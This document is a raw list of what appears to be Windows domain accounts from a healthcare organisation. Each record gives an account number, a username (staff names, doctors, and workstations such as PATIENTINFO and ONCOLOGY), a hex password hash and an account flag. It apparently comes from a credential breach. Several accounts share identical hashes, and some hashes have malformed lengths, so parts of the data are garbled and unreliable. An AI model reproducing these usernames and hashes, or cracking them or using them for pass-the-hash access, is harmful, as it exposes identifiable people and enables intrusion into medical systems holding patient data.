1747 sophierussell 69be67ef02c321ac27d320769fed0bcf 512 1749 gripleytest b0121e3d65f926674e464945aeddf1ca 66048 1126 avculek c0c4c300fe507080ff5c62377b55195c 544 1750 sherrimcfarren 1abe6ca510c51de5a55a42a1231a5b81 512 1279 jmosher 426adc1fa9503d802a45be29f045dc6f 544 1418 manderson 239266bb61b6a686d84204cab036be96 512 1229 rwachlarowicz 5cac67bc64b56133a61b1af214f8c2d0 544 1681 noramelby 71c6f855b625f6b88c451a86cdb81bdb 514 1595 tamaraharthun f5ec168977a081d026c4f9645e9303e2 514 1145 ijones 6ee7580d75845d96d8baa76517f4264b 544 1705 kendradenker 2d782825f402ebf523ce5422c31a5227 512 1417 mrecords 5b4c6335673a75f13ed948e848f00840 512 1565 sherrimaanum 35291d6b63c9f4ddf70c80834ea8dfe1 514 1662 supplytemp 1532d83b4f7965e623218b86602a9e93 514 1573 webconference 5b4c6335673a75f13ed948e848f00840 66050 1666 mariahokerstrom ebca32f06ce5e64c30d3e4bef85f6080 514 1672 petekutter 7423675713fb84177d9dc6dceed6a9131 512 1742 pkutter3 d8c5e4ad038d4f40665a9b5da8bcdc0a 512 1763 helmerswenson 5b4c6335673a75f13ed948e848f00840 512 1158 lab 3e89395612d185dc77d09dc80ab4139d 544 1505 pkutter2 7423675713fb84177d9dc6dceed6a9131 512 1441 lrosin 060366f3ab4cee59cfda5dc22d9c5941 514 1479 pkutter 6208a13d22b8d3994676469e3e348c79 512 1777 WINDOWSUPDATE$ 5c8e86b8ba437559ef0d89e4139349c7 4096 1779 johnirvin 5b4c6335673a75f13ed948e848f00840 512 1781 tomhegarty 05121df3fdd96d30be27a44fcf75b5c3 512 1786 markvukonich 5b4c6335673a75f13ed948e848f00840 512 1778 phillipkellar 85ceb62376586c525f8c5a7f541753ab 512 1789 lanawhiteking 3fae0e888ec3deb796cb4f1baf59b4c5 512 1791 OUTREACH01$ 3e2a9a9a1dfb0b934c78e1372051f5a091 4096 1259 jkowitz 493f5fb81b19868e9dc354a5fa9961cd 546 1246 slarson a7564b574cfa7b683826358597a8643b 546 1659 marciakempton c79b79f7006f09c9e5efee4304608bb7 514 1611 bridgetgrenier 18a60aac5e33c62d4b919ca7f1001692 514 1658 madgecourtney e4bd7f71e68c1d26a92611cd64fa3cae 514 1407 ereger 72e926193b59892fa05353669545eb453a 514 1419 kbutler 5dbb20ff0c4d681f0ba0009ba39a0ef 514 1455 eanderson 
93c6701c7cbed0e3023f9d8d40d9c8 514 1575 kimborgus 5b4c6335673a75f13ed948e848f00840 514 1219 amuxfeldt 7c0e3947902a10eb0ae30b806212c381 546 1582 deannawilliams e97080efbef8899068a2f11892ea9c85 514 1414 leleman 53a74835ef5a47c958e64fd2dde54de9 514 1694 jodeeolson b82758bd889a0f4c2bd0328789c39e23 514 1171 phokanson 27df247abba83984d992b30d26437725 546 1153 jhubbes 31caa2be4001aa2037501fe528aecf61 546 1796 davidflach 1f90d3748e7ad48d787c09c619d40139 66048 1222 pjohnson a8365c7713ff934fd450585ce45f37a6 546 1568 pattyjohnson a8365c7713ff934fd450585ce45f37a6 512 1798 TEMP06$ deeb839a9c7a5cf7f7feff6138cc4af2 4096 1549 amyneumann 5e30961fe4cf335f62de09e3470924d7 512 1818 todd.ziemke ebc2a1deef991b10154f6a1bf2479d0d 66048 1182 tmark 1613c77529e775dc94a2ca2d281791e3 544 1127 bbecker 275d29f95970d4d98f7e8a70652d8dda 544 1771 johntate dc6a9770c8ec8d065a04fd49fd16d198 512 1592 tinaeckhoff 5b4c6335673a75f13ed948e848f00840 66048 1188 wswenson a557ffd2f275dd484ee86ad2d5fc6c75 544 1546 michellelohse c23aa06230298e8b6990af4c7154e74b 512 1758 shawnellingson 1cb77b834155d1f434b90aacb8a152c9 512 1755 webinar ad4ffc7b10f3cfe742598fde57a3a94c 512 1824 bdsnaza 2222cef39d072fd5b25e330db776a4c2 512 1232 drsanderson 1fe4bfb27630ce0822ec3c88a7e8ceb6 66080 1201 dewert 5b4c6335673a75f13ed948e848f00840 544 1341 ADMIN08$ 3af095859833ed237478d8a9b78c4c59 4096 1526 ADMIN04$ 3ba870504dd9671edf26765e5855f384 4096 1368 ADMIN02$ fc18303a65a4820f2688cbbdfab90139 4096 1350 CODING11$ a9e0c63fecb1bb50c89141b4d2093dea 4096 1616 DIABETICED01$ 569931f15a10a10540782fa0f8950ae9 4096 1329 DIABETIC01$ f9c755912efa816fa15a79310696d66a 4096 1646 EKG04$ 797e43fd76855c76d4616f3d61010a8748 4096 1633 EKG03$ e1ddc8fc353e29dc037bc7e3645b9124 4096 2114 INSURANCE05$ d7d71e53dcfb92294aa1d541ead6348a 4096 1477 INUSRANCE06$ fea736b11ebc4055f3a0e9b5e7de967b 4096 1285 MEDICALTRANS11$ f7706b117bfcc4d73f6564e8c2aa6c24 4096 1291 MEDTRANST01$ fdacb7b544dbb4e57416a62d6ad4a73d 4096 1650 MEDTRANS24$ 3a1f788e7786d191ddf8cecd95ac975a 
4096 1540 MEDTRANS20$ cd2d747d526cf2abad99151443e12db1 4096 1293 MEDTRANS10$ 67185a00ddc12e054d691c5b17055f1f 4096 1296 MEDTRANS09$ 1785748439ba65655268a74b1bf4cae2 4096 1298 MEDTRANS05$ 87c0adeb12992157b1bf53daa0094bb7 4096 1284 MEDTRANS04$ 5986cd130ec92a6819018b035b3e1835 4096 1297 MEDTRANS03$ 73e5241104ec35fc77a16da8729919ad 4096 1331 ENT01$ 00a3a02e678afc3f1cc1b3427c74a4a6 4096 1301 HIS03$ 9ffda8fb210a973885ed64687521799c 4096 1308 LABOFFICE$ b8350de7ce2c7d69c80516ac5c80619a 4096 2146 LAB02$ 0d71cae27bfd6ba290c2dc4dcb58a6e9 4096 1517 trishdeutschman 2bd054b019b30ef9b4d53b1a9a6eb56b 66050 1461 shalvorson 0bd704c8a12024d095fc7cbf1ed8f72f 512 1465 nanderson 2b8efcb05bd8426f5338f6a06b7f7f09 512 1463 lniesche 4ed7184a5b83f2de1ec6d23237497c0e 512 1462 dgrefe 3cad0e0f95ca6d0c60989955d794b6b1 512 1464 bzimmel f85ebe09110f73f149a7ba58be020591 512 1130 blnurse 78001de4cfef2bf1afcdb3c2a6efffd 544 1460 bwoessner 702f70098a144bfb7c7a1457556ed95c 514 1684 aprilvculek aed6234fbf01c56c16a2521831bc6e5a 512 2148 BLCTRANS05$ 68f3358b0d47feac2942b9ff49d1b312 4096 2142 BLCNURSE02$ 5547023037dc738d985c9901a5129152 4096 2151 BLCNURSE01$ 79e1363d6878871bbe36632c664f6d4a 4096 1675 IT02$ 8b4694da4e512c09194020f90701b1e6 4096 1474 WRCRECEPTION$ f868dad2f1096572c522e56ff51c575c 4096 2197 WHTRECEPTION01$ a6bb50d21fb70416b20c68717be9d02e 4096 1711 PHARMACY01$ 9bee950ff25ec085153753ea621f8b27a 4096 1570 DRVANVALKENBURG$ 9004b38c8a78c88980669b327d260436 4096 1630 DR-TOMB$ f99781df952704f664d7df5bfb929db5 4096 1772 DR-TATE$ 98a40706e695660266392c0e9dce074d 4096 2149 DR-SWENSON$ 952d302fc8aed0b6f8a825afd063705f 4096 2169 DRNORGARD-MAC$ 541b638eeb32bd344a2f4ac2f0b55d 4096 1319 DR-KOWITZ$ 3dc71cd69625a6bdee71a1fe60404245 4096 1315 DR-KALIHER$ 1d8645068fdeea15c73337c6a43be9e7 4096 2138 DRHENDELBL$ 72252fe5b2ad55cc2e608665b086eb7c 4096 1324 PLINDHOLM$ 77cdaa15e267709c302069e9a86e7869 4096 1471 sspilde 3204577732a9532bd95dcbb0539486a0 512 1469 joachs 301a1168cc69d2a4255e44e8881c7310 512 1470 ahansen 
43fc73d691784a72ceaa65d9606f3592 512 1396 whtreception 9380147741154115433e6bda9436212b0e52 66048 1450 front d2a7d55bfa7a7183e69d69dfeceeda41 66048 1346 VERNON1$ 9bf548fdc3e20e1748140fa106ca4361 4096 2159 ONCOLOGY02$ 523fa53bf9e60b3445a2b0f8a39788a6 4096 1410 dschultz 8da5df4b55e013803ab1be9847bd4bc 512 1305 PATIENTINFO01$ 3594c1d47c352dfac0a77eb9465ed4be 4096 1304 PATIENTINFO03$ 83b8caa3964b05711b29951e497f46ac 4096 1803 stephanidyrhaug 38acbd84c347890bddb0b67ced9872c9 512 2170 REGPATINFO01$ f3db83ea90ce03c9d59f18b7d98e790b 4096 1536 CASHIER02$ c5ef9a634b52c1196ac1608b33862680 4098 2182 PATIENTINFO02$ c079c13edc63f38d43ff3ef83382236a 4098 2110 REGISTRATION01$ 3d7e32302558c0c4ba80e9dbaed449f5 4098 2111 CASHIER01$ 22c913392d573561c7009cc5a129fb60 4098 1374 REGISTRATION02$ 16db1ca289846dbf02ee9609c9d28a27 4098 1459 knelson 4f019a0452ee8e4a676f274fc355f954 512 2181 INSURANCE11$ f47c2c8290c79639f9710478d295587e 4096 1309 UROLOGY01$ e5b6b52c13493ae4dbdc30ddf6f51368 4096 2139 BLCRECEPTION$ 156c1ba2d682dd3d0081880e3d07b03d 4096 1211 gmathison 59cf57821c7934a345404fc8e43fcf7c 544 1394 meolson e3bdc12145b172b358940a203285570f 512 1359 ONCOLOGY01$ 331da257042cf50b8184e74c9715e8 4096 1283 kgullickson$ 66d364525032a0af2ce6ddff7608fb50 66080 1577 DR-UROLOGY$ 111e437573a1c0757e0ade030969aeb4 4096 1793 cynthiaknutson$ ba63c041662150375c627d163df382e9 66048 1799 ADMIN16$ 3b015d3d7bc1fb7f6b63ae4aa801fe1f 4098 1524 lisajohnson 77120a4a97532a21b5018f6abc150e2a 512 1492 snjos 952049408e1609b06c686c17cb85e36d 512 1567 DRVENNERSTROM$ 1bfa12f14519c91c1220e63d392fb5f5 4096 2116 PATIENTACCTS03$ 8b4b7896a8e0e190b49439d18c735352 4096 1150 jgeary f045401a5e4c75dbbe4c3b7d04de4628 544 1133 cnyberg fa82f78268095544cc4d907b7def29f1 544 1627 DR-LOKKEN$ 3b4cf9dc445a87cd539cec25725f5f08 4096 1744 fadelnammour 088b8ec27bc87547ea243690958e3ac6 512 1652 kimberlylarson 5de62f77575690f8153c9501032fc13c 512 1599 AntekBackup 105f046b8599099f367f272be28e43a4 66048 1430 INSURANCE04$ 
80bf6833bd5638da8fc8d03ec2fb548c 4096 1700 aslee 0679c2a1910ce60218bba46f9b40b199 66048 1262 bmoney 7c2caf0670958ed23d938b31370f3ec5 66080 1432 PATIENTACCTS05$ 1d00af409631d12994167ef90778827f 4096 1835 mlwalvatne 88cb33147a81b3a953cd3ec488659e13 66048 1452 landerson 7a78e93cd40ffafab3827b8c26710471 66048 1451 WRC01$ 80227b83e88dcdae99f92f2f9c4b1ae0 4096 1380 hmfranklin 9610a5bd075e949b52b1fc09fb8990d9 66048 1636 dennisamundson 7f5fe8d956c5f007d34ae1dd522f06b7 512 2185 DLEMBCKE$ 27b3206db0f71451ac66fbf6409629a76 4096 1458 kleahy a1232ecb9b9e514d01cc4145e784bed4 512 2632 WRCLAB$ c55a0201fd6a6f9d8a59133edd87e375 4096 1449 back 78daf3c73c9a4aeac54ac63e56d94a59 66048 2107 FAMMEDAPPT01$ 1eea9adf3e89dd1f975ac6c1a4c6eb8f 4096 1388 mjohnson 791ef17fbef4082b078d3370c3e38ffc 512 1764 alisonnyberg 036d108a06213115050eec957305993e 512 1311 PSYCH01$ 0560f82387bb2e3cc2b0aa7ae3f7af6e 4096 1678 kathleenotte 654f2a78ba47d681510bb83c1929692a 512 1841 rlfjestad 8658e527137be2043bef77b1f109717f 66048 1842 jljerger d72bf765ff46c10a813d81509e976d99 66048 1843 kaspanswick 66ca5d9051d246da0095f9b4438abca4 66048 1845 aklarson 375faab26efb75ee4acb667202b530a8 66048 2188 UROLOGY02$ 1265e6ef43e1fb3a0b6acec8cb8d4535 4096 1788 stacywilde $7105ac60400f33e1a1fd33515a201e32 512 2150 MAINTENANCE$ 210fb141b751c90ab1732e8ab100ea50 4096 1682 ADMIN12$ cb9d235c6738afb2e1d085ec19a243a0 4098 1334 IUSR_CLINIC c6fa98673090d4b7e1d5afb35e9bee8d 66080 1822 larandadrechsel fe33f0e2f0dea6137c269af5bdb8471e 512 1427 dcavazos eac9df0d9f41f7a5c8b54b2df6d0033b 512 2140 INTERNALMED91$ 0a60ac715991b17cb43f7ef90b83343b 4096 2633 arquispe 1f1f42fa606ef8651fa159af91410632 66048 1494 troers f6e3d88419421ff66c998f847ce10122 512 1354 INSURANCE09$ da29f0e0c41ed98c6974c192e77455d9 4096 1523 jerimitchell a49567804cf6c815185339671d65fbb2 512 1522 JERIMITCHELL$ 37eecd83535b58b58e8954d53f602682 4096 1128 bpetersen c1528d77dab8f3314e34945e2a721661 66080 1226 lroehl cc3539f01f68edcf34511c40a5fd56c7 544 1337 ORTHO01OLD$ 
8fe2067e26962a88a041b2cffe983c90 4096 1433 PATIENTACCTS04$ 8bd0fcfcf11735a798af4bc21aaf0e4f 4096 1431 PATIENTACCTS01$ 19ce274cf766487cd70249becde7c895 4096 1566 robertvennerstrom 9f184706e86e497fcbb3e9ba4768914d 512 1313 PATIENTACCOUNTS$ 747d92bb686ef860aca8b48a022b2cfa 4096 1837 mlohren 34d77bde8b4e251be614b7915a632a8b 66048 1227 lobowa af1766a8045f8b8b14e34927e05f21560e 544 1249 jandrews 8a20c0bb05fc9cca4996a9fd5ff72476 544 2141 DR-HORAK$ 71390b7c47471298bec922208ae47ab1 4096 2203 cmjorud 74cb2e5e4ba7b180260a1c839c9ae69b 66048 2204 arbranstad 2d9e0d2b6fef04bba4a3daab32e4232d 66048 1529 jhorak 71e77db8a282c6c55d44abb6f9c0a054 66048 1698 drmahale f39f527fb825f6ea3c93e9b0c2d7bc9f 512 1466 kbjohnson c1a593239afbce6cfe1d806758533ea9 512 1519 cherylmostue 0dbcfe529e464fd8f767eb082b2dd424 66048 1512 loiskelm 8f37fd56564f1ec544e6b2f2948bfb41 512 1737 DR-MATHISON$ 89ddc588738d1540ec04cdbbc98c1417 4096 1231 dtbjork 46045df676465a5b2b8bf98e4615bacd 66080 2200 DR-SAMSON$ c5a616473f89642e2eb85e1556670cc7 4096 1634 WRC-DR$ 2a88b22201be0af7731f2d61edf4ec83 4096 2634 reringdahl d9a475be75065aae9e07e91ed2dfba4c 66048 1610 gwennordahl ac560e65500eb28945e5fe709a61039 512 2115 PATIENTACCTS02$ bea9eeb03c24458963bd882fc007e3f6 4096 2637 saolson a3174064e5df297ceaebaf4682a611ef 66048 1663 ADMIN11$ 5b8a979bb35799f2ffcb94e602765e08 4098 1838 kacarlsrud 69902cbb1f0753b0dd420ffe93d8c37f 66048 1357 PREREG05OLD$ 7a3ce4d803bb2ceb3e62be05077864d4 4096 1530 MEDTRANSMARILYN$ 79cbe72f19fa06d3615b5eb1d7c265fc 4096 1765 jodischmidt e638115d1bed2f4559e2724bf718c68c 512 1761 hmswenson 43bbea9c86860260bb062a7afb02f83d 66048 1306 PREREG02$ d2d251565b2617af100e3a42da1a60d6 4098 2120 BLCGWENNORDAHL$ 34fba012fac91c67b0abc6c83a2ef533 4096 1804 DR-BJORK$ bd991b081aa200289f265bf24c9f0296 4096 1511 carolynanderson $6e973177c2119f032711f9e1bb63c2ac 512 1514 maryannkugler 47db18043c3cfc26460098b23f9aac 66048 1467 clpahl b788d93e4ea6359d732a376c493fff8b 66048 2641 jphagen d8b2054e1b81a0ebf9680d7b2539a358 66048 
2642 hmfoley 6408b8bbd9f73d3ce22b478957656334 66048 2643 cknelson 2ff9219189803bfacaa6ab5b16a7cebd 66048 2644 eboen 8e7459e6b38a6715c7537f8cd4cfcbb7 66048 1606 jemarquardt 98685dd2bf78647d14f0db5d9a4a9f84 66048 2645 kssem 646a976226faac0916e9789af9692bfd6 66048 2646 tmtarpley d9098a0547c911f6704df1f1fef9948b 66048 2647 trmurdock 84aeec4981e5a5d26cf316ae0647b152 66048 1453 mmmatthys 51b0b7d25592ab1612fb2e8479548daf 66048 1378 PREREG01$ 22cbbbe74aea12d6f5553946c7ed40e8 4098 1323 FAMILYMED02$ 90796bd8f3c6ca9e165bfb39fb82529e 4096 1393 mhaugen 14e6dcdaf76ac00823d3131a20034a35 512 1142 aevavold ecc56abc4486fbce0cbca1ef10c0a2bf 544 1557 kimborgos 9b71edf13ad0572d0c45e39996c93691 512 1328 PEDS01$ 2eac3f966ce03b9b84420da1eb988bea 4096 2196 ADMIN14$ cadaa67d74a5b10475a162883626eac5 4096 1797 mattflugstad 7b4f904f0a3767eab8f4dc0dcb83c783 512 1508 djboese 7c816d1b1d7332cb1006e75c6696ca95 66048 1832 enevavold b49f724ceb4bf0bfcac2e9e5b9af0390 66048 1597 TEMP01$ e27d80ce8f486f6ea70f7b2dec573f58 4096 2649 slaune 817a0349953470719e5c71ab0ba9718a 66048 2650 djcollins ce2867a41e585b0e419da424decc95ce 66048 1628 ericlokken debe275316ec95f77673a7094ce789d8 512 1836 emklemm aac1bffec43a308fe420edf27c34c086 66048 1180 sschlueter 3393f3a49a6a3c2a8233e7a29a7e8571 544 1539 FAMILYMED04$ 1fc8312cb97eed635566c595c3360053 4096 1207 dlembcke 9755affbd969d8b64821225cee8105e5 544 1322 FAMILYMED01$ 14ab3166a00551358504f0517044ec8b 4096 2163 DATAENTRY09$ 289d62338eb611b822bf50f32821bb5b 4096 1561 karaaxell b6585b2e5e494d90459e8b49a734318b 512 1330 OB01$ ed27abc006be74f70ca88bcc27d1341f 4096 2165 DR-FAMILYMED$ 87c2d0337a01fca5231b698daf9dcd81 4096 1141 dmoe d8a0a68924b7b8dad11e0940ee72a147 544 1191 cmindermann ddc0d48f1a551ff6d363075da87156d5 544 1600 OB02$ d37146eb251f844c54a15e8ef69e41d8 4096 1333 SURGERY01$ c333dccc03ac0f9533ff5c79203cc79d 4096 2176 MEDTRANS16$ 424628c70a696f86d3aaf053ac6c8514 4098 1551 cnlokhorst 6d019eb15ca3c7ee90b7f7793b78e036 66048 1149 jrhendel 
b71d24640b20a6dbc37be7d53e2ee467 66080 1213 pshol 8a94d4f8364a148658655222831e3024 544 1601 missyhalvorson fca4c011f682f0f3fa4f6d3a04ee4426 512 1318 PATIENTCARE01OL$ 884dc98711f6e32e2efc3d25ff26258a 4096 1456 smswiontek 229e88beb6ae9bea431e24279dbd2daa 66048 1225 amlewis 023785652249a821b0b9e45265c65fd5 544 1553 susanwoessner 7d769604287a3dc5fc34a4f622b791ee 512 2651 slpletcher 124513c6c851a7e030e4195ee096167b 66048 1174 rteberg 2536ca3621d2a556a95b90277c603478 544 1510 sbjohnson dee6f3cba2dc8623865d96f715edf5c6 66048 1228 bmharrington 8556eb9ac049c9da0a58aeefc33fe26 66080 2153 MEDTRANS19$ fe3ee30a000b50bffbc551f8d672bf36 4096 1569 llsternberg 3bfec37541454590f097d224fefad535d2 66048 1123 asievert 71a2ea36e010c680ca56837dca89cf98 544 1312 TEMP04$ c777984d36ec8bee411df0fd496ddb4b 4096 1397 CODING01$ dd54b460f0bc621d3c01ecb5c6c8b30d 4096 1623 dlhieronimus ab9ba244b8d32985f2a8e20af5febee4 66048 1593 ADMIN06$ 76ac5778c8cb4ba5db24a48946ba7c99 4096 1156 jhanson 3117b575da28313397c9f07fe0788161 544 1392 drobb fd5187235a3ea7cd03de399a0c7e60f7 512 2652 training1 5b4c6335673a75f13ed948e848f00840 66048 2653 training2 5b4c6335673a75f13ed948e848f00840 66048 1290 MEDICALTRANS12$ 7853157b9b745d070feae60b214d053a 4098 1218 slsem 5d018a45a9eb0473f3c3cd3718de6c3b 66080 1379 dblondeau 547cfb1788a7d82432937554ea25ee409 514 2639 jalaplante cbf9e0b72739278db0f82dee1fcea78d 66048 1669 DR-THOM$ 73814287ed9b1c974831be868b465292 4096 1667 drthom ce19b3c08eefb3c70f7ff8d635bca0ee 66048 1829 haottenbacher e957cf961db72e8b18461f42b32b8307 66048 1198 cstigen 5654690ff05f50725ceec956aff0368b 66080 2109 SURGENTONC01$ 2f034c2a1f40cfeb511d10e606ce37ef 4096 1776 tonyahaugen 48deb295316d246d254b26b4e92dda03 512 1429 INSURANCE03$ 74f59bf10ce03689e0712b4273ec0f1d 4096 1535 FAMILYMED03$ fe0710502a956e92384e7d9a7c8889e7 4096 1612 angelabradsteen dd410cd895b93b3934776adb54edba62 512 1367 WRCTRAN1$ f3c39d4c526c5538af06ee21a76e9200 4096 1167 molson 411ae78b736d4129ac0a703057740c47 544 1224 cljohnson 
7e9bfc1129b337bdb60d0cb5be4247fc 546 1828 cleverding 3d2bf9da6ada0a0a4b3b3d46e9fe534a 66048 1134 cherylbarry c1dcee10f37da0dea2cce60897c2321a 544 1687 MEDTRANS25$ 5dca8d270c6882f44e9dd649f25f629d 4096 1178 scarter 00d89524084a96eaac5c40f51dfdf366 544 1176 sscott e278c482037f529bce78ceae66682bb6 544 1753 rachelvoll c9e4848f8e5f27b8b032574ba8b7749a 512 1502 vrode a4e86f232d9fcb641f74d5b9ff6f174c 66048 3106 klkeller 80c8b29db94ed0b30dcd438dfae41a50 66048 3107 nrweisenberger c5e0feb26fdbf60ea0e03383a29325bf 66048 3108 mmseidel ba4abe889054e18290060d89f206ae48 66048 1473 jdevries c4177c274066c380d41139e9d1fca44f 512 1683 FAMILYMED-NP$ 66901cbb214faa25bcfc5e7e8b204b93 4096 1402 medicaltrans2 f4332692c33d971140c51f1c13bea277 512 1152 jhammerot ddefb7e3b9fded75097dca0a01550e86 544 1159 lstrand 70fde05069984a79d00b146770495ee1 544 1370 whtnurse 9380147741154115433e6bda9436212b0e52 66048 1525 amasterman 723faab47a59cdf95f2d127b7a246477 512 1649 MEDTRANS23$ ed6eba734e562e8acf46cba80043e9e9 4098 1653 FAMILYMED05$ 992813fbd886480d285796002a5968d8 4096 1398 FAMMEDAPPT02$ c4d54a40e9d2589f3528639a1f3c1d81 4096 1442 cernerftp 45a3cb1686cf73e75de4575d13851ab0 66048 1826 crcolosky edebf24db8fd09f1a0f968a391cef2fc 66048 1564 karinelson 658969fcace05a933cbee707c4eef749 512 1773 djwest 20e57fe5249b0fdfbf6eae26e3b22339 66048 1701 DRLINDHOLM$ 965cc24ca05d1a94a37f22bf673c0a1b 4096 2198 DRKALIHER$ f4c0534510ae4428c775bdce52807c8e 4096 2187 BLNURSE01$ d36c9badcec99ad637ca21c1d0bebd40 4096 2183 WCHCNURSE01$ f471524d13af418c236669dd385cb574 4096 1579 INTERNALMED13$ bf26dcea9711e5d0caf310bddd1aeade 4096 1468 lnwohlenhaus e43f35677cec0cd6fbdd26f5f3d35722 66048 1548 joanneness 7eff3a0679e8f5f2eb76b153a9f29bc2 512 1282 jkaliher c59508253f1ba8a772ea7b39cabcf7dd 544 1547 cfvorland e8254befc20061f88fa9f42a41e0c8dd 66048 1588 INTERNALMED05$ 74dfc491aa9f632ae983e77a0ee992d6 4098 1434 CODING03$ 58dcbcae8d1e316e2bc1ec4775b14fc3 4098 1782 WCHCREC01$ e613f09276cef85f7dcad726d3cb0626 4098 1706 BLNURSE02$ 
5c9fcf92a716ad5b280dd40e5c224ec5 4096 2166 INTERNALMED04$ 1772fedc1c75ddb0f732f6d82ec7542c 4098 1563 marciadillon 1ff36f57aff1d5db8800d2c785a0cae0 512 1314 EYECLINIC03$ f5e575e5035047984bd3ae88b1bb842a 4096 1281 plindholm$ c075a7246f4c8bef9d38a2d3a133bc2f 544 1629 DR-TONG$ ce9517b78f3c0d9af31f8db61b195c67 4096 1620 gjtong a5b7100b4aa7f8e93071be40f23b82b2 514 1713 PSYCH02$ 63cb7ec250904af4b7c8061f4b54f278 4098 1552 pltell 36c71052cc9f3df09b42f66f537ce603 66048 2144 ANDREWS$ 11acd59c59fc6defa1a51bf3fe0881f8 4098 1527 kevinshaikoski 172a3e327f8b438e17bf91c54c2f252d 514 1766 rebekahgraffunder 822ad3ce5ecce942944613d290a1f1 514 1454 dakempkes 7c36ee96da103a81763531f2ef613191 66050 1516 aprilklimp 6290bfeea1c751208379cee5ed256ead 66050 1743 loricodner e0173ccd6386a350351f9d52ee6c100d 514 1560 naomiolson da93b661760477edfc6ed312f935556e 514 3110 jllankow 2a45242c15f59e6db3c6fbd5da7e683b 66048 1544 ambest 4edc397bd51b40cbfb2596541127d304 66048 1545 machelleellingson ee75c6d3c79105d330c2bd99d5f16c13 512 1384 bness 44794d58c8ad82bd1b84d49ad357baa2 512 3105 INTERNALMED01$ b0dfb253773c6ddf3ec25a73411e47ea 4098 2191 UROLOGY03$ 44057957cb485b4ddc9b8cae7fcc1c0 4098 2164 INTERNALMED02$ 4b93eda1b8da8ddc653949f46724ccdf 4098 1144 hschwartz 0af153b7782e2bef7f22fe8701ff2127 544 1721 denellelshaug 6e00fa5bac85e2eb7d33137f568617f9 512 1695 pstoy 6f4f88cf36cefc95fd15f8050e443622 512 1385 mmoen 7e22d1e711e2bfcb3b2c539cde161983 512 2194 IT04$ c8ee40eba7ecec79acd94a7d0d3f18ea 4096 1147 jehlert 8c5be24a23f8376dc130a24f1579b6f3 544 1399 INTMEDAPPT01$ 7bb7aadf3d2b40e5f2223f4ae0801b29 4098 1840 evencmmr 82a26287c079231373962613246069c7 66048 1400 INTMEDAPPT02$ 1353ed719c6e123bea73764629151539 4098 2648 jmrolfes b5a5c6224f40840258f1bbd5d4b60fbb 66048 1490 dmschneider a15d8bcc287f442cfc33c52526ab0686 512 2157 INTMEDAPPT03$ 3d5b526687817f7f49cd290eeb54964d 4098 1194 chendrickson 99878c755fb267a08fe660dd78a42acd 544 1316 EYECLINIC01$ d4482fd2e501d0f9fed861b8a44606817 4096 2147 CREDENTIALING01$ 
296a4b084c43dc8ce62f92e547a95827 4096 1541 jillbrethorst b72eb474b1a81360edce11f955161bce 512 1161 lveitenheimer a80c3b05e0ccda6f83b2cb351ac4e1ae 544 1699 DR-STOY$ a8fe39e3e13ddd6a2ba2f1f05d23b19e0 4096 1808 nSpire Health 18ed4f4a43886dd171e7ab736541d76e 66048 1703 DR-GUNDERSEN$ 3bcc9a3d703dc8dbb67b4d3f33f47f3d 4096 1702 markgundersen 13490c009d26bcb6d231f1316ce062b1 512 1604 janicespies 542194ccf81d43b11bbae6a7f4c9aef9 66048 1692 mattmouser b56354d9266cba25422ab15e8547bcf5 512 1805 PULMONARYFUNCTI$ b4ac4781048ae6bc156b35374c720236 4096 1691 DR-MOUSER$ 74904c49f700c9e15f16d00a98554379 4096 2192 WCHCDR01$ b5b287ce3c338de11db07f943c7f6f53 4096 1395 sgallagher a0739df192b64e0aeca567856e913705 66048 3112 aeroberts 13036200cef18a0854f1dd70cc88c584 66048 1677 NURSINGSVC02$ 700b442ec8d3c24b15e0f0176910aad8 4098 1676 NURSINGSVC01$ d6b73ca78b54798073325bdea19cee3e 4098 2152 MEDTRANS13$ 5d0f76df54a3dbed955fcea211f5f0fb 4096 1655 leannrogness 5f8067b5789c266da48ba92406cc5294 512 1631 kathystaples 5f0d75e121e61086b26b54f7eb9f20b8 512 1166 mtonneson 4de8a532a09d5b9eb19e07b89a49b115 544 3114 mebruininga 12050de9174a28b116fd22989bde2b10 66048 3115 vfuhren 2bbac362a13887c361297c7162bb9db8 66048 3117 kagraff 2044f66498f0c00f498578399f0321a0 66048 3116 krcave 5dfd676a553b492038ec102aa87c6881 66048 1632 EKG01$ 5bdbe0a1bcbb964a45580e623a35a2d5 4098 1639 EKG02$ 048090faec12de815a1f6eaf1bd8bb6a 4098 1160 lakress e0f69fcbdc87a5416eb39b3bd8d854a0 544 1499 MEDTRANS15$ 6cc1aa413d4a07964f07cb8076c3bdbc 4096 1644 COUMADIN01$ 5aea7c089660ac3160589fdc725a131b 4098 1594 jillhaarstad dc4ad240083c4b5e225d663f665df425 512 2156 ASHBY01$ 2daa327a11da7616e6a003c37b068393 4098 2121 CODING08$ b38d8949a9780a8200accd4bdd31946c 4096 2199 ADMIN17$ 968c5bbe05450a1d3edc5cfb9023a3da 4096 1422 jgregor 9d8675b2b751eb80f9e7dd44ae20c804 512 1732 ADMIN13$ 430ff2671e737ebd75cd281de29e3951 4096 1491 amyeggen 14437b13fa716df7f0e4946d40e76e4 512 3113 klpetersen b2b1ec98869242a0bf4679c26e2423d4 66048 3118 tmumlauf 
aa09adad01510f97e46b6c4bd2b69d05 66048 1696 kirstenkragness 3e0841fed5cc10c48ab3ce07bfe3f8b5 512 2127 MEDTRANS14$ 31ad33f98e82e243e3b3cf4ee987d7a0 4096 1792 mariebraaten 638ec491ee8c4e668300716fa5b5413a 512 1794 MARIEBRAATEN$ 158b0ed3305ce77d6b730455f4ac710 4098 1185 tkingston a4d9ff4db31b133550e1c7edaad3a512 544 1157 kolson 39efab3df60b62e4ffad0fc3b9e0870d 544 1622 TEMP03$ 97ac7fb1237e7f6e0bd92fde0187c4ff 4098 2172 TRAINING20$ da302136f0b1541ecef05186d67853b1 4098 2179 MEDTRANS31$ 559e1cb97968f19c7b79b3a85b463148 4098 1626 sknohre 7046e2789522b425e06c93a2c948630f 66048 1177 sjurgens 3d0eea1cfc5228ec422bdb14b6f405c3 544 2118 EYECLINIC05$ 3c5e9b307d98163b0f1cae00271dc08f 4096 2117 EYECLINIC04$ 5ee1856892069fc5432be1cc485306be 4096 2113 INSURANCE02$ 05081de692e8edf7dbc363b7cac4f982 4096 1501 PATIENTCARE03$ e6eae8c4cb8808079dfafe61b5352887a2 4096 1373 APPTPOOL2$ 3472ed81cd705d6f69d60413888bf100 4098 1375 APPTPOOL4$ 15c9d9f93e25839c80701535afb06a5d 4098 1376 APPTPOOL5$ 5b70cb98e678198f1209b5f8d141af34 4098 1172 pbutcher 62de4b93217ca34b98914535c6e90ee4 544 1372 APPTPOOL1$ af0ee09d232222ad1f2fdf0998946ad73d 4098 2112 APPTPOOL3$ dd85150ecdfae3d23b8f084d7f40bc00 